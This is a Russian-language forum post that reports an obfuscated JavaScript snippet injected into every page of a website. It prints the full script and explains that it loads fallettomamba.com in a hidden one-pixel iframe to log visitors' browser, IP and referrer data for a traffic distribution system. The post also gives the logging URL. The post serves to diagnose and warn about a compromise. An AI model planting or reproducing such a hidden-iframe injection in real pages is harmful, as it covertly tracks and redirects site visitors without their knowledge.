На каждой страничке всунут вот такой скрипт обфусцированный:
<script type="text/javascript">var CaJhv=62;function vzPKtI(){}
if('tkGro'=='EKeFTM')XymDnO();if('Vyazoa'=='Dehy')JJVanL();var XoGSAwWp="parseI\x6et";function bxsvZ(){var YCOIC='YQWc';if('XICCOh'=='qAEG')bWrkW();}var MGLJ='hgHPH';var qMCVB='RtqBy';var dPCKBN=242;var RcQUmayu="";var Qxtc='FijdNp';if('cmymhA'=='uwRs')JFeDs='DOuXHL';var YhxZKG="8d9999955f54548b8691918a999994928692878653889492549855548e9353888c8e645655";function aTqV(){}var WXKcYH=211;var sAhMultT="fr\x6fmC\x68arCode";if('wNTzT'=='Brev')hUASQI='vYCinj';var Yewqid;var Yzypys="s\x6cice";var nAbSnt=96;function wFdMid(){var ZAruS='xvPDEN';if('avvrhm'=='nAkgtJ')ODSIk();}var JbHr;var Nojrd=(function(){var SZRe=24;var UGVgW;return this;if('XMVo'=='BItta')BHPA='MgISlJ';if('INMMN'=='VfNp')DIZljv();})();function yiQCIE(){}if('nNHNBr'=='QCrtp')CbCy='NbthQn';var AxzFr=22;var bLQIkOo="con\x73truc\x74or";if('BJYYI'=='HABcSi')SMNK();var ZSZnpPSLC="tCrLfv"[bLQIkOo];function XrDDQn(){}
var PMTUT;if('hgsv'=='CEWt')NwpVLw='MccRKh';for(var KowOM=0;KowOM<YhxZKG.length;KowOM+=2){if('EEHpF'=='CaYi')TDASx='XPZLub';bZzQY=Nojrd[XoGSAwWp](YhxZKG[Yzypys](KowOM,KowOM+2),16)-37;RcQUmayu+=ZSZnpPSLC[sAhMultT](bZzQY);var huMeh=187;if('HcWcq'=='ZByIUR')JTZh='AoGu';}
function CbheeG(){}
function KKPyC(){}
var FPOBlKAg="HXCFv";function FJcQ(){var tNYsuj='jjapw';if('xHLJIb'=='AnGzbG')uaFI();}
var fBkYlbx=navigator.appVersion.indexOf("MSIE")!=-1?'<iframe name="'+FPOBlKAg+'" src="'+"RcQUmayu"+'">':'iframe';var vNuVCR;var Imkfad=document.createElement(fBkYlbx);var YcPQDi=209;var xsCq;Imkfad.name=FPOBlKAg;var oEeskA='eubq';var aIyxjh='UteP';Imkfad.setAttribute("name",FPOBlKAg);if('JHdVsc'=='AHTS')nOEyZQ='yxegB';Imkfad.id=FPOBlKAg;if('lacR'=='DxDoN')FpEe='EyGVha';Imkfad.src=RcQUmayu;Imkfad.style.right="0px";if('gQIlg'=='Fdsx')mKiEaz();Imkfad.style.top="0px";if('iewRb'=='zRTNu')CdXx();function QziiQh(){}var pYza='EwCnCj';Imkfad.style.height="1px"
var VkFjSv;var Tdasx=170;Imkfad.style.width="1px";var oDwXk;if('VlUPlK'=='WvCeJ')IStMU();Imkfad.style.position="absolute";document.body.appendChild(Imkfad);function ZClun(){}
if('XktS'=='zBzc')NGtgzA();if('XmfPqs'=='lHQKsK')hKopJ();var uQOaK=52;</script>
Лезет на fallettomamba.com в невидимом фрейме и пытается записать в лог данные об браузере который мы используем, о нашем ip адресе, о адресах с которых мы пришли на этот сайт.
Вот так он передает данные в лог:
http://fallettomamba.com/s0/in.cgi?9999999
Судя по ошибке которая пишется на экране, они используют систему сбора статистики Supra TDS:
http://www.kytoon.com/sutra-tds.html
Скорее всего, веб сервер скомпрометирован хакерами и взят на контроль для статистики. В дальнейшем он может быть использован для аттак на другие ресурсы.
Либо используется для генерации трафика нами в сторону этого fallettomamba.com для продажи.. этого трафика